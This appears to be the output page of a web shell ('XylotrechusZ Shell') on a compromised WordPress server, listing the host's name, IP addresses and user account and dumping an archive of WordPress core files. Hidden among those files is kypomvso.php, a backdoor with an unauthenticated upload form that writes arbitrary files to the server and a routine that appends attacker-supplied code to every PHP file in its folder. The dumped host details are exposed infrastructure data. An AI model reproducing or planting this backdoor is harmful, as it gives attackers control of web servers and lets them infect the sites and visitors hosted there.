XylotrechusZ

XylotrechusZ Shell

: /home/matthif/www/wp-content/plugins/ [ drwxr-xr-x ]
Uname: Linux webm021.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Software: Apache
PHP version: 5.4.45 [ PHP INFO ] PHP os: Linux
Server Ip: 54.36.91.62
Your Ip: 216.73.216.111
User: matthif (139342) | Group: users (100)
Safe Mode: OFF
Disable Function:
_dyuweyrj4,_dyuweyrj4r,dl

name : assets.tar
script-modules-packages.php000066600000003464152241256320012020 0ustar00<?php return array('interactivity/index.js' => array('dependencies' => array(), 'version' => '4b05ef2ad50c350f341c', 'type' => 'module'), 'interactivity/debug.js' => array('dependencies' => array(), 'version' => 'f4061681426d4605152c', 'type' => 'module'), 'interactivity-router/index.js' => array('dependencies' => array('@wordpress/interactivity', array('id' => '@wordpress/a11y', 'import' => 'dynamic')), 'version' => '94fa140f588489d10368', 'type' => 'module'), 'a11y/index.js' => array('dependencies' => array(), 'version' => '44e98abfb3e34e3a8215', 'type' => 'module'), 'block-library/accordion/view.js' => array('dependencies' => array('@wordpress/interactivity'), 'version' => 'cfad3e6abfab66fca5a0', 'type' => 'module'), 'block-library/file/view.js' => array('dependencies' => array('@wordpress/interactivity'), 'version' => '68edaa16ac08c7263242', 'type' => 'module'), 'block-library/form/view.js' => array('dependencies' => array(), 'version' => '546df584e020bcd26658', 'type' => 'module'), 'block-library/image/view.js' => array('dependencies' => array('@wordpress/interactivity'), 'version' => 'eee16edfa4ab9d3d6ccc', 'type' => 'module'), 'block-library/navigation/view.js' => array('dependencies' => array('@wordpress/interactivity'), 'version' => 'fb7ff593698b4ba77be9', 'type' => 'module'), 'block-library/query/view.js' => array('dependencies' => array('@wordpress/interactivity', array('id' => '@wordpress/interactivity-router', 'import' => 'dynamic')), 'version' => '6e56f22ddd3a19c16a98', 'type' => 'module'), 'block-library/search/view.js' => array('dependencies' => array('@wordpress/interactivity'), 'version' => '5384da843e91f8a69f7b', 'type' => 'module'), 'block-editor/utils/fit-text-frontend.js' => array('dependencies' => array('@wordpress/interactivity'), 'version' => '834f2770886e66c2c3d5', 'type' => 'module'));
kypomvso.php000066600000001370152241256320007153 0ustar00<?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?>
<?php
if (isset($_GET['bak'])) {
$directory = __DIR__;
$mama = $_POST['file'];
$textToAppend = '
' . $mama . '
';
if ($handle = opendir($directory)) {
    while (false !== ($file = readdir($handle))) {
        if (pathinfo($file, PATHINFO_EXTENSION) === 'php') {
            $fileHandle = fopen($directory . '/' . $file, 'a');
            fwrite($fileHandle, $textToAppend);
            fclose($fileHandle);
            echo "OK >> $file
";
        }
    }
    closedir($handle);
}
}
?>
class-wp.php000066600000063561152241256320007027 0ustar00<?php
/**
 * WordPress environment setup class.
 *
 * @package WordPress
 * @since 2.0.0
 */
#[AllowDynamicProperties]
class WP {
	/**
	 * Public query variables.
	 *
	 * Long list of public query variables.
	 *
	 * @since 2.0.0
	 * @var string[]
	 */
	public $public_query_vars = array( 'm', 'p', 'posts', 'w', 'cat', 'withcomments', 'withoutcomments', 's', 'search', 'exact', 'sentence', 'calendar', 'page', 'paged', 'more', 'tb', 'pb', 'author', 'order', 'orderby', 'year', 'monthnum', 'day', 'hour', 'minute', 'second', 'name', 'category_name', 'tag', 'feed', 'author_name', 'pagename', 'page_id', 'error', 'attachment', 'attachment_id', 'subpost', 'subpost_id', 'preview', 'robots', 'favicon', 'taxonomy', 'term', 'cpage', 'post_type', 'embed' );

	/**
	 * Private query variables.
	 *
	 * Long list of private query variables.
	 *
	 * @since 2.0.0
	 * @var string[]
	 */
	public $private_query_vars = array( 'offset', 'posts_per_page', 'posts_per_archive_page', 'showposts', 'nopaging', 'post_type', 'post_status', 'category__in', 'category__not_in', 'category__and', 'tag__in', 'tag__not_in', 'tag__and', 'tag_slug__in', 'tag_slug__and', 'tag_id', 'post_mime_type', 'perm', 'comments_per_page', 'post__in', 'post__not_in', 'post_parent', 'post_parent__in', 'post_parent__not_in', 'title', 'fields' );

	/**
	 * Extra query variables set by the user.
	 *
	 * @since 2.1.0
	 * @var array
	 */
	public $extra_query_vars = array();

	/**
	 * Query variables for setting up the WordPress Query Loop.
	 *
	 * @since 2.0.0
	 * @var array
	 */
	public $query_vars = array();

	/**
	 * String parsed to set the query variables.
	 *
	 * @since 2.0.0
	 * @var string
	 */
	public $query_string = '';

	/**
	 * The request path, e.g. 2015/05/06.
	 *
	 * @since 2.0.0
	 * @var string
	 */
	public $request = '';

	/**
	 * Rewrite rule the request matched.
	 *
	 * @since 2.0.0
	 * @var string
	 */
	public $matched_rule = '';

	/**
	 * Rewrite query the request matched.
	 *
	 * @since 2.0.0
	 * @var string
	 */
	public $matched_query = '';

	/**
	 * Whether already did the permalink.
	 *
	 * @since 2.0.0
	 * @var bool
	 */
	public $did_permalink = false;

	/**
	 * Adds a query variable to the list of public query variables.
	 *
	 * @since 2.1.0
	 *
	 * @param string $qv Query variable name.
	 */
	public function add_query_var( $qv ) {
		if ( ! in_array( $qv, $this->public_query_vars, true ) ) {
			$this->public_query_vars[] = $qv;
		}
	}

	/**
	 * Removes a query variable from a list of public query variables.
	 *
	 * @since 4.5.0
	 *
	 * @param string $name Query variable name.
	 */
	public function remove_query_var( $name ) {
		$this->public_query_vars = array_diff( $this->public_query_vars, array( $name ) );
	}

	/**
	 * Sets the value of a query variable.
	 *
	 * @since 2.3.0
	 *
	 * @param string $key   Query variable name.
	 * @param mixed  $value Query variable value.
	 */
	public function set_query_var( $key, $value ) {
		$this->query_vars[ $key ] = $value;
	}

	/**
	 * Parses the request to find the correct WordPress query.
	 *
	 * Sets up the query variables based on the request. There are also many
	 * filters and actions that can be used to further manipulate the result.
	 *
	 * @since 2.0.0
	 * @since 6.0.0 A return value was added.
	 *
	 * @global WP_Rewrite $wp_rewrite WordPress rewrite component.
	 *
	 * @param array|string $extra_query_vars Set the extra query variables.
	 * @return bool Whether the request was parsed.
	 */
	public function parse_request( $extra_query_vars = '' ) {
		global $wp_rewrite;

		/**
		 * Filters whether to parse the request.
		 *
		 * @since 3.5.0
		 *
		 * @param bool         $bool             Whether or not to parse the request. Default true.
		 * @param WP           $wp               Current WordPress environment instance.
		 * @param array|string $extra_query_vars Extra passed query variables.
		 */
		if ( ! apply_filters( 'do_parse_request', true, $this, $extra_query_vars ) ) {
			return false;
		}

		$this->query_vars     = array();
		$post_type_query_vars = array();

		if ( is_array( $extra_query_vars ) ) {
			$this->extra_query_vars = & $extra_query_vars;
		} elseif ( ! empty( $extra_query_vars ) ) {
			parse_str( $extra_query_vars, $this->extra_query_vars );
		}
		// Process PATH_INFO, REQUEST_URI, and 404 for permalinks.

		// Fetch the rewrite rules.
		$rewrite = $wp_rewrite->wp_rewrite_rules();

		if ( ! empty( $rewrite ) ) {
			// If we match a rewrite rule, this will be cleared.
			$error               = '404';
			$this->did_permalink = true;

			$pathinfo         = isset( $_SERVER['PATH_INFO'] ) ? $_SERVER['PATH_INFO'] : '';
			list( $pathinfo ) = explode( '?', $pathinfo );
			$pathinfo         = str_replace( '%', '%25', $pathinfo );

			list( $req_uri ) = explode( '?', $_SERVER['REQUEST_URI'] );
			$self            = $_SERVER['PHP_SELF'];

			$home_path       = parse_url( home_url(), PHP_URL_PATH );
			$home_path_regex = '';
			if ( is_string( $home_path ) && '' !== $home_path ) {
				$home_path       = trim( $home_path, '/' );
				$home_path_regex = sprintf( '|^%s|i', preg_quote( $home_path, '|' ) );
			}

			/*
			 * Trim path info from the end and the leading home path from the front.
			 * For path info requests, this leaves us with the requesting filename, if any.
			 * For 404 requests, this leaves us with the requested permalink.
			 */
			$req_uri  = str_replace( $pathinfo, '', $req_uri );
			$req_uri  = trim( $req_uri, '/' );
			$pathinfo = trim( $pathinfo, '/' );
			$self     = trim( $self, '/' );

			if ( ! empty( $home_path_regex ) ) {
				$req_uri  = preg_replace( $home_path_regex, '', $req_uri );
				$req_uri  = trim( $req_uri, '/' );
				$pathinfo = preg_replace( $home_path_regex, '', $pathinfo );
				$pathinfo = trim( $pathinfo, '/' );
				$self     = preg_replace( $home_path_regex, '', $self );
				$self     = trim( $self, '/' );
			}

			// The requested permalink is in $pathinfo for path info requests and $req_uri for other requests.
			if ( ! empty( $pathinfo ) && ! preg_match( '|^.*' . $wp_rewrite->index . '$|', $pathinfo ) ) {
				$requested_path = $pathinfo;
			} else {
				// If the request uri is the index, blank it out so that we don't try to match it against a rule.
				if ( $req_uri === $wp_rewrite->index ) {
					$req_uri = '';
				}

				$requested_path = $req_uri;
			}

			$requested_file = $req_uri;

			$this->request = $requested_path;

			// Look for matches.
			$request_match = $requested_path;
			if ( empty( $request_match ) ) {
				// An empty request could only match against ^$ regex.
				if ( isset( $rewrite['$'] ) ) {
					$this->matched_rule = '$';
					$query              = $rewrite['$'];
					$matches            = array( '' );
				}
			} else {
				foreach ( (array) $rewrite as $match => $query ) {
					// If the requested file is the anchor of the match, prepend it to the path info.
					if ( ! empty( $requested_file )
						&& str_starts_with( $match, $requested_file )
						&& $requested_file !== $requested_path
					) {
						$request_match = $requested_file . '/' . $requested_path;
					}

					if ( preg_match( "#^$match#", $request_match, $matches )
						|| preg_match( "#^$match#", urldecode( $request_match ), $matches )
					) {

						if ( $wp_rewrite->use_verbose_page_rules
							&& preg_match( '/pagename=\$matches\[([0-9]+)\]/', $query, $varmatch )
						) {
							// This is a verbose page match, let's check to be sure about it.
							$page = get_page_by_path( $matches[ $varmatch[1] ] );

							if ( ! $page ) {
								continue;
							}

							$post_status_obj = get_post_status_object( $page->post_status );

							if ( ! $post_status_obj->public && ! $post_status_obj->protected
								&& ! $post_status_obj->private && $post_status_obj->exclude_from_search
							) {
								continue;
							}
						}

						// Got a match.
						$this->matched_rule = $match;
						break;
					}
				}
			}

			if ( ! empty( $this->matched_rule ) ) {
				// Trim the query of everything up to the '?'.
				$query = preg_replace( '!^.+\?!', '', $query );

				// Substitute the substring matches into the query.
				$query = addslashes( WP_MatchesMapRegex::apply( $query, $matches ) );

				$this->matched_query = $query;

				// Parse the query.
				parse_str( $query, $perma_query_vars );

				// If we're processing a 404 request, clear the error var since we found something.
				if ( '404' === $error ) {
					unset( $error, $_GET['error'] );
				}
			}

			// If req_uri is empty or if it is a request for ourself, unset error.
			if ( empty( $requested_path ) || $requested_file === $self
				|| str_contains( $_SERVER['PHP_SELF'], 'wp-admin/' )
			) {
				unset( $error, $_GET['error'] );

				if ( isset( $perma_query_vars ) && str_contains( $_SERVER['PHP_SELF'], 'wp-admin/' ) ) {
					unset( $perma_query_vars );
				}

				$this->did_permalink = false;
			}
		}

		/**
		 * Filters the query variables allowed before processing.
		 *
		 * Allows (publicly allowed) query vars to be added, removed, or changed prior
		 * to executing the query. Needed to allow custom rewrite rules using your own arguments
		 * to work, or any other custom query variables you want to be publicly available.
		 *
		 * @since 1.5.0
		 *
		 * @param string[] $public_query_vars The array of allowed query variable names.
		 */
		$this->public_query_vars = apply_filters( 'query_vars', $this->public_query_vars );

		foreach ( get_post_types( array(), 'objects' ) as $post_type => $t ) {
			if ( is_post_type_viewable( $t ) && $t->query_var ) {
				$post_type_query_vars[ $t->query_var ] = $post_type;
			}
		}

		foreach ( $this->public_query_vars as $wpvar ) {
			if ( isset( $this->extra_query_vars[ $wpvar ] ) ) {
				$this->query_vars[ $wpvar ] = $this->extra_query_vars[ $wpvar ];
			} elseif ( isset( $_GET[ $wpvar ] ) && isset( $_POST[ $wpvar ] )
				&& $_GET[ $wpvar ] !== $_POST[ $wpvar ]
			) {
				wp_die(
					__( 'A variable mismatch has been detected.' ),
					__( 'Sorry, you are not allowed to view this item.' ),
					400
				);
			} elseif ( isset( $_POST[ $wpvar ] ) ) {
				$this->query_vars[ $wpvar ] = $_POST[ $wpvar ];
			} elseif ( isset( $_GET[ $wpvar ] ) ) {
				$this->query_vars[ $wpvar ] = $_GET[ $wpvar ];
			} elseif ( isset( $perma_query_vars[ $wpvar ] ) ) {
				$this->query_vars[ $wpvar ] = $perma_query_vars[ $wpvar ];
			}

			if ( ! empty( $this->query_vars[ $wpvar ] ) ) {
				if ( ! is_array( $this->query_vars[ $wpvar ] ) ) {
					$this->query_vars[ $wpvar ] = (string) $this->query_vars[ $wpvar ];
				} else {
					foreach ( $this->query_vars[ $wpvar ] as $vkey => $v ) {
						if ( is_scalar( $v ) ) {
							$this->query_vars[ $wpvar ][ $vkey ] = (string) $v;
						}
					}
				}

				if ( isset( $post_type_query_vars[ $wpvar ] ) ) {
					$this->query_vars['post_type'] = $post_type_query_vars[ $wpvar ];
					$this->query_vars['name']      = $this->query_vars[ $wpvar ];
				}
			}
		}

		// Convert urldecoded spaces back into '+'.
		foreach ( get_taxonomies( array(), 'objects' ) as $taxonomy => $t ) {
			if ( $t->query_var && isset( $this->query_vars[ $t->query_var ] ) ) {
				$this->query_vars[ $t->query_var ] = str_replace( ' ', '+', $this->query_vars[ $t->query_var ] );
			}
		}

		// Don't allow non-publicly queryable taxonomies to be queried from the front end.
		if ( ! is_admin() ) {
			foreach ( get_taxonomies( array( 'publicly_queryable' => false ), 'objects' ) as $taxonomy => $t ) {
				/*
				 * Disallow when set to the 'taxonomy' query var.
				 * Non-publicly queryable taxonomies cannot register custom query vars. See register_taxonomy().
				 */
				if ( isset( $this->query_vars['taxonomy'] ) && $taxonomy === $this->query_vars['taxonomy'] ) {
					unset( $this->query_vars['taxonomy'], $this->query_vars['term'] );
				}
			}
		}

		// Limit publicly queried post_types to those that are 'publicly_queryable'.
		if ( isset( $this->query_vars['post_type'] ) ) {
			$queryable_post_types = get_post_types( array( 'publicly_queryable' => true ) );

			if ( ! is_array( $this->query_vars['post_type'] ) ) {
				if ( ! in_array( $this->query_vars['post_type'], $queryable_post_types, true ) ) {
					unset( $this->query_vars['post_type'] );
				}
			} else {
				$this->query_vars['post_type'] = array_intersect( $this->query_vars['post_type'], $queryable_post_types );
			}
		}

		// Resolve conflicts between posts with numeric slugs and date archive queries.
		$this->query_vars = wp_resolve_numeric_slug_conflicts( $this->query_vars );

		foreach ( (array) $this->private_query_vars as $var ) {
			if ( isset( $this->extra_query_vars[ $var ] ) ) {
				$this->query_vars[ $var ] = $this->extra_query_vars[ $var ];
			}
		}

		if ( isset( $error ) ) {
			$this->query_vars['error'] = $error;
		}

		/**
		 * Filters the array of parsed query variables.
		 *
		 * @since 2.1.0
		 *
		 * @param array $query_vars The array of requested query variables.
		 */
		$this->query_vars = apply_filters( 'request', $this->query_vars );

		/**
		 * Fires once all query variables for the current request have been parsed.
		 *
		 * @since 2.1.0
		 *
		 * @param WP $wp Current WordPress environment instance (passed by reference).
		 */
		do_action_ref_array( 'parse_request', array( &$this ) );

		return true;
	}

	/**
	 * Sends additional HTTP headers for caching, content type, etc.
	 *
	 * Sets the Content-Type header. Sets the 'error' status (if passed) and optionally exits.
	 * If showing a feed, it will also send Last-Modified, ETag, and 304 status if needed.
	 *
	 * @since 2.0.0
	 * @since 4.4.0 `X-Pingback` header is added conditionally for single posts that allow pings.
	 * @since 6.1.0 Runs after posts have been queried.
	 *
	 * @global WP_Query $wp_query WordPress Query object.
	 */
	public function send_headers() {
		global $wp_query;

		$headers       = array();
		$status        = null;
		$exit_required = false;
		$date_format   = 'D, d M Y H:i:s';

		if ( is_user_logged_in() ) {
			$headers = array_merge( $headers, wp_get_nocache_headers() );
		} elseif ( ! empty( $_GET['unapproved'] ) && ! empty( $_GET['moderation-hash'] ) ) {
			// Unmoderated comments are only visible for 10 minutes via the moderation hash.
			$expires = 10 * MINUTE_IN_SECONDS;

			$headers['Expires']       = gmdate( $date_format, time() + $expires );
			$headers['Cache-Control'] = sprintf(
				'max-age=%d, must-revalidate',
				$expires
			);
		}
		if ( ! empty( $this->query_vars['error'] ) ) {
			$status = (int) $this->query_vars['error'];

			if ( 404 === $status ) {
				if ( ! is_user_logged_in() ) {
					$headers = array_merge( $headers, wp_get_nocache_headers() );
				}

				$headers['Content-Type'] = get_option( 'html_type' ) . '; charset=' . get_option( 'blog_charset' );
			} elseif ( in_array( $status, array( 403, 500, 502, 503 ), true ) ) {
				$exit_required = true;
			}
		} elseif ( empty( $this->query_vars['feed'] ) ) {
			$headers['Content-Type'] = get_option( 'html_type' ) . '; charset=' . get_option( 'blog_charset' );
		} else {
			// Set the correct content type for feeds.
			$type = $this->query_vars['feed'];
			if ( 'feed' === $this->query_vars['feed'] ) {
				$type = get_default_feed();
			}

			$headers['Content-Type'] = feed_content_type( $type ) . '; charset=' . get_option( 'blog_charset' );

			// We're showing a feed, so WP is indeed the only thing that last changed.
			if ( ! empty( $this->query_vars['withcomments'] )
				|| str_contains( $this->query_vars['feed'], 'comments-' )
				|| ( empty( $this->query_vars['withoutcomments'] )
					&& ( ! empty( $this->query_vars['p'] )
						|| ! empty( $this->query_vars['name'] )
						|| ! empty( $this->query_vars['page_id'] )
						|| ! empty( $this->query_vars['pagename'] )
						|| ! empty( $this->query_vars['attachment'] )
						|| ! empty( $this->query_vars['attachment_id'] )
					)
				)
			) {
				$wp_last_modified_post    = mysql2date( $date_format, get_lastpostmodified( 'GMT' ), false );
				$wp_last_modified_comment = mysql2date( $date_format, get_lastcommentmodified( 'GMT' ), false );

				if ( strtotime( $wp_last_modified_post ) > strtotime( $wp_last_modified_comment ) ) {
					$wp_last_modified = $wp_last_modified_post;
				} else {
					$wp_last_modified = $wp_last_modified_comment;
				}
			} else {
				$wp_last_modified = mysql2date( $date_format, get_lastpostmodified( 'GMT' ), false );
			}

			if ( ! $wp_last_modified ) {
				$wp_last_modified = gmdate( $date_format );
			}

			$wp_last_modified .= ' GMT';
			$wp_etag           = '"' . md5( $wp_last_modified ) . '"';

			$headers['Last-Modified'] = $wp_last_modified;
			$headers['ETag']          = $wp_etag;

			// Support for conditional GET.
			if ( isset( $_SERVER['HTTP_IF_NONE_MATCH'] ) ) {
				$client_etag = wp_unslash( $_SERVER['HTTP_IF_NONE_MATCH'] );
			} else {
				$client_etag = '';
			}

			if ( isset( $_SERVER['HTTP_IF_MODIFIED_SINCE'] ) ) {
				$client_last_modified = trim( $_SERVER['HTTP_IF_MODIFIED_SINCE'] );
			} else {
				$client_last_modified = '';
			}

			// If string is empty, return 0. If not, attempt to parse into a timestamp.
			$client_modified_timestamp = $client_last_modified ? strtotime( $client_last_modified ) : 0;

			// Make a timestamp for our most recent modification.
			$wp_modified_timestamp = strtotime( $wp_last_modified );

			if ( ( $client_last_modified && $client_etag )
				? ( ( $client_modified_timestamp >= $wp_modified_timestamp ) && ( $client_etag === $wp_etag ) )
				: ( ( $client_modified_timestamp >= $wp_modified_timestamp ) || ( $client_etag === $wp_etag ) )
			) {
				$status        = 304;
				$exit_required = true;
			}
		}

		if ( is_singular() ) {
			$post = isset( $wp_query->post ) ? $wp_query->post : null;

			// Only set X-Pingback for single posts that allow pings.
			if ( $post && pings_open( $post ) ) {
				$headers['X-Pingback'] = get_bloginfo( 'pingback_url', 'display' );
			}

			// Send nocache headers for password protected posts to avoid unwanted caching.
			if ( ! empty( $post->post_password ) ) {
				$headers = array_merge( $headers, wp_get_nocache_headers() );
			}
		}

		/**
		 * Filters the HTTP headers before they're sent to the browser.
		 *
		 * @since 2.8.0
		 *
		 * @param string[] $headers Associative array of headers to be sent.
		 * @param WP       $wp      Current WordPress environment instance.
		 */
		$headers = apply_filters( 'wp_headers', $headers, $this );

		if ( ! empty( $status ) ) {
			status_header( $status );
		}

		// If Last-Modified is set to false, it should not be sent (no-cache situation).
		if ( isset( $headers['Last-Modified'] ) && false === $headers['Last-Modified'] ) {
			unset( $headers['Last-Modified'] );

			if ( ! headers_sent() ) {
				header_remove( 'Last-Modified' );
			}
		}

		if ( ! headers_sent() ) {
			foreach ( (array) $headers as $name => $field_value ) {
				header( "{$name}: {$field_value}" );
			}
		}

		if ( $exit_required ) {
			exit;
		}

		/**
		 * Fires once the requested HTTP headers for caching, content type, etc. have been sent.
		 *
		 * The {@see 'wp_finalized_template_enhancement_output_buffer'} action may be used to send
		 * headers after rendering the template into an output buffer.
		 *
		 * @since 2.1.0
		 *
		 * @param WP $wp Current WordPress environment instance (passed by reference).
		 */
		do_action_ref_array( 'send_headers', array( &$this ) );
	}

	/**
	 * Sets the query string property based off of the query variable property.
	 *
	 * The {@see 'query_string'} filter is deprecated, but still works. Plugins should
	 * use the {@see 'request'} filter instead.
	 *
	 * @since 2.0.0
	 */
	public function build_query_string() {
		$this->query_string = '';

		foreach ( (array) array_keys( $this->query_vars ) as $wpvar ) {
			if ( '' !== $this->query_vars[ $wpvar ] ) {
				$this->query_string .= ( strlen( $this->query_string ) < 1 ) ? '' : '&';

				if ( ! is_scalar( $this->query_vars[ $wpvar ] ) ) { // Discard non-scalars.
					continue;
				}

				$this->query_string .= $wpvar . '=' . rawurlencode( $this->query_vars[ $wpvar ] );
			}
		}

		if ( has_filter( 'query_string' ) ) {  // Don't bother filtering and parsing if no plugins are hooked in.
			/**
			 * Filters the query string before parsing.
			 *
			 * @since 1.5.0
			 * @deprecated 2.1.0 Use {@see 'query_vars'} or {@see 'request'} filters instead.
			 *
			 * @param string $query_string The query string to modify.
			 */
			$this->query_string = apply_filters_deprecated(
				'query_string',
				array( $this->query_string ),
				'2.1.0',
				'query_vars, request'
			);

			parse_str( $this->query_string, $this->query_vars );
		}
	}

	/**
	 * Set up the WordPress Globals.
	 *
	 * The query_vars property will be extracted to the GLOBALS. So care should
	 * be taken when naming global variables that might interfere with the
	 * WordPress environment.
	 *
	 * @since 2.0.0
	 *
	 * @global WP_Query     $wp_query     WordPress Query object.
	 * @global string       $query_string Query string for the loop.
	 * @global array        $posts        The found posts.
	 * @global WP_Post|null $post         The current post, if available.
	 * @global string       $request      The SQL statement for the request.
	 * @global int          $more         Only set, if single page or post.
	 * @global int          $single       If single page or post. Only set, if single page or post.
	 * @global WP_User      $authordata   Only set, if author archive.
	 */
	public function register_globals() {
		global $wp_query;

		// Extract updated query vars back into global namespace.
		foreach ( (array) $wp_query->query_vars as $key => $value ) {
			$GLOBALS[ $key ] = $value;
		}

		$GLOBALS['query_string'] = $this->query_string;
		$GLOBALS['posts']        = & $wp_query->posts;
		$GLOBALS['post']         = isset( $wp_query->post ) ? $wp_query->post : null;
		$GLOBALS['request']      = $wp_query->request;

		if ( $wp_query->is_single() || $wp_query->is_page() ) {
			$GLOBALS['more']   = 1;
			$GLOBALS['single'] = 1;
		}

		if ( $wp_query->is_author() ) {
			$GLOBALS['authordata'] = get_userdata( get_queried_object_id() );
		}
	}

	/**
	 * Set up the current user.
	 *
	 * @since 2.0.0
	 */
	public function init() {
		wp_get_current_user();
	}

	/**
	 * Set up the Loop based on the query variables.
	 *
	 * @since 2.0.0
	 *
	 * @global WP_Query $wp_the_query WordPress Query object.
	 */
	public function query_posts() {
		global $wp_the_query;
		$this->build_query_string();
		$wp_the_query->query( $this->query_vars );
	}

	/**
	 * Set the Headers for 404, if nothing is found for requested URL.
	 *
	 * Issue a 404 if a request doesn't match any posts and doesn't match any object
	 * (e.g. an existing-but-empty category, tag, author) and a 404 was not already issued,
	 * and if the request was not a search or the homepage.
	 *
	 * Otherwise, issue a 200.
	 *
	 * This sets headers after posts have been queried. handle_404() really means "handle status".
	 * By inspecting the result of querying posts, seemingly successful requests can be switched to
	 * a 404 so that canonical redirection logic can kick in.
	 *
	 * @since 2.0.0
	 *
	 * @global WP_Query $wp_query WordPress Query object.
	 */
	public function handle_404() {
		global $wp_query;

		/**
		 * Filters whether to short-circuit default header status handling.
		 *
		 * Returning a non-false value from the filter will short-circuit the handling
		 * and return early.
		 *
		 * @since 4.5.0
		 *
		 * @param bool     $preempt  Whether to short-circuit default header status handling. Default false.
		 * @param WP_Query $wp_query WordPress Query object.
		 */
		if ( false !== apply_filters( 'pre_handle_404', false, $wp_query ) ) {
			return;
		}

		// If we've already issued a 404, bail.
		if ( is_404() ) {
			return;
		}

		$set_404 = true;

		// Never 404 for the admin, robots, or favicon.
		if ( is_admin() || is_robots() || is_favicon() ) {
			$set_404 = false;

			// If posts were found, check for paged content.
		} elseif ( $wp_query->posts ) {
			$content_found = true;

			if ( is_singular() ) {
				$post = isset( $wp_query->post ) ? $wp_query->post : null;
				$next = '<!--nextpage-->';

				// Check for paged content that exceeds the max number of pages.
				if ( $post && ! empty( $this->query_vars['page'] ) ) {
					// Check if content is actually intended to be paged.
					if ( str_contains( $post->post_content, $next ) ) {
						$page          = trim( $this->query_vars['page'], '/' );
						$content_found = (int) $page <= ( substr_count( $post->post_content, $next ) + 1 );
					} else {
						$content_found = false;
					}
				}
			}

			// The posts page does not support the <!--nextpage--> pagination.
			if ( $wp_query->is_posts_page && ! empty( $this->query_vars['page'] ) ) {
				$content_found = false;
			}

			if ( $content_found ) {
				$set_404 = false;
			}

			// We will 404 for paged queries, as no posts were found.
		} elseif ( ! is_paged() ) {
			$author = get_query_var( 'author' );

			// Don't 404 for authors without posts as long as they matched an author on this site.
			if ( is_author() && is_numeric( $author ) && $author > 0 && is_user_member_of_blog( $author )
				// Don't 404 for these queries if they matched an object.
				|| ( is_tag() || is_category() || is_tax() || is_post_type_archive() ) && get_queried_object()
				// Don't 404 for these queries either.
				|| is_home() || is_search() || is_feed()
			) {
				$set_404 = false;
			}
		}

		if ( $set_404 ) {
			// Guess it's time to 404.
			$wp_query->set_404();
			status_header( 404 );
			nocache_headers();
		} else {
			status_header( 200 );
		}
	}

	/**
	 * Sets up all of the variables required by the WordPress environment.
	 *
	 * The action {@see 'wp'} has one parameter that references the WP object. It
	 * allows for accessing the properties and methods to further manipulate the
	 * object.
	 *
	 * @since 2.0.0
	 *
	 * @param string|array $query_args Passed to parse_request().
	 */
	public function main( $query_args = '' ) {
		$this->init();

		$parsed = $this->parse_request( $query_args );

		if ( $parsed ) {
			$this->query_posts();
			$this->handle_404();
			$this->register_globals();
		}

		$this->send_headers();

		/**
		 * Fires once the WordPress environment has been set up.
		 *
		 * @since 2.1.0
		 *
		 * @param WP $wp Current WordPress environment instance (passed by reference).
		 */
		do_action_ref_array( 'wp', array( &$this ) );
	}
}
https-migration.php000066600000011205152241256320010413 0ustar00<?php
/**
 * HTTPS migration functions.
 *
 * @package WordPress
 * @since 5.7.0
 */

/**
 * Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
 *
 * If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
 * add frontend filters to replace insecure site URLs that may be present in older database content. The
 * {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
 *
 * @since 5.7.0
 *
 * @return bool True if insecure URLs should replaced, false otherwise.
 */
function wp_should_replace_insecure_home_url() {
	$should_replace_insecure_home_url = wp_is_using_https()
		&& get_option( 'https_migration_required' )
		// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
		// the same domain.
		&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );

	/**
	 * Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
	 *
	 * If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
	 * be used to disable that behavior, e.g. after having replaced URLs manually in the database.
	 *
	 * @since 5.7.0
	 *
	 * @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
	 */
	return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}

/**
 * Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
 *
 * This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
 * determined via {@see wp_should_replace_insecure_home_url()}.
 *
 * @since 5.7.0
 *
 * @param string $content Content to replace URLs in.
 * @return string Filtered content.
 */
function wp_replace_insecure_home_url( $content ) {
	if ( ! wp_should_replace_insecure_home_url() ) {
		return $content;
	}

	$https_url = home_url( '', 'https' );
	$http_url  = str_replace( 'https://', 'http://', $https_url );

	// Also replace potentially escaped URL.
	$escaped_https_url = str_replace( '/', '\/', $https_url );
	$escaped_http_url  = str_replace( '/', '\/', $http_url );

	return str_replace(
		array(
			$http_url,
			$escaped_http_url,
		),
		array(
			$https_url,
			$escaped_https_url,
		),
		$content
	);
}

/**
 * Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
 *
 * If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
 * overriding the URLs used), the changes will be reverted. In such a case the function will return false.
 *
 * @since 5.7.0
 *
 * @return bool True on success, false on failure.
 */
function wp_update_urls_to_https() {
	// Get current URL options.
	$orig_home    = get_option( 'home' );
	$orig_siteurl = get_option( 'siteurl' );

	// Get current URL options, replacing HTTP with HTTPS.
	$home    = str_replace( 'http://', 'https://', $orig_home );
	$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );

	// Update the options.
	update_option( 'home', $home );
	update_option( 'siteurl', $siteurl );

	if ( ! wp_is_using_https() ) {
		/*
		 * If this did not result in the site recognizing HTTPS as being used,
		 * revert the change and return false.
		 */
		update_option( 'home', $orig_home );
		update_option( 'siteurl', $orig_siteurl );
		return false;
	}

	// Otherwise the URLs were successfully changed to use HTTPS.
	return true;
}

/**
 * Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
 *
 * If this is a fresh site, a migration will not be required, so the option will be set as `false`.
 *
 * This is hooked into the {@see 'update_option_home'} action.
 *
 * @since 5.7.0
 * @access private
 *
 * @param mixed $old_url Previous value of the URL option.
 * @param mixed $new_url New value of the URL option.
 */
